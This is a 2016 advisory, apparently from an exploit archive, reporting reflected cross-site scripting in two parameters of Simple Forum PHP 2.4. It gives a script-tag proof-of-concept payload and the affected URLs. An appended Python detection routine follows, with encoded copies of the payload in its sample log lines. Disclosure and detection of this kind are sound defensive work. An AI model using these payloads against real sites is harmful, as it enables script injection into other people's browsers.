Simple Forum PHP version 2.4 suffers from a cross-site scripting vulnerability.
=====================================================
# Simple Forum PHP 2.4 - Reflected XSS
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable parameter : SysMessage
Method : GET
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url:
http://localhost/forum/preview.php?SysMessage=[payload]
Vulnerable parameter : search
Method : POST
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url:
http://simpleforumphp.com/forum/admin.php
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
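
# Detection example (added here, not part of the original advisory or the vendor's code):
A defender-side check for the two parameters named above, run over web server access log lines (GET case) and captured form bodies (POST case). The combined log format, the function names and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Script -> parameter pairs named in the advisory.
WATCHED = {"preview.php": "SysMessage", "admin.php": "search"}
# Heuristic: tag openers, inline event handlers, javascript: URLs.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript\s*:", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo layered percent-encoding (%253C -> %3C -> <), bounded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious(script, params):
    """True if the watched parameter of this script carries markup."""
    name = WATCHED.get(script)
    return any(MARKUP.search(decode_fully(v)) for v in params.get(name, []))

def scan_access_log(lines):
    """Return log lines whose query string trips the check (GET case)."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m:
            url = urlsplit(m.group(1))
            if suspicious(url.path.rsplit("/", 1)[-1], parse_qs(url.query)):
                hits.append(line)
    return hits

def scan_post_body(script, body):
    """Same check on a form-encoded POST body (the search case)."""
    return suspicious(script, parse_qs(body))

# Constructed sample lines; client addresses are documentation ranges.
PREFIX = '203.0.113.9 - - [14/Oct/2016:10:00:00 +0000] "GET /forum/preview.php'
SAMPLE_LOG = [
    PREFIX + '?SysMessage=Post+saved HTTP/1.1" 200 512',
    PREFIX + '?SysMessage=%3Cscript%3Ealert(%27Reflected+XSS%27)'
             '%3C%2Fscript%3E HTTP/1.1" 200 540',
    PREFIX + '?SysMessage=%253Cscript%253Ealert(%2527Reflected%2520XSS%2527)'
             '%253C%252Fscript%253E HTTP/1.1" 200 540',
]
```

scan_access_log(SAMPLE_LOG) returns the second and third lines. The pattern is a heuristic, so a legitimate search term containing "<" followed by a letter will also be flagged.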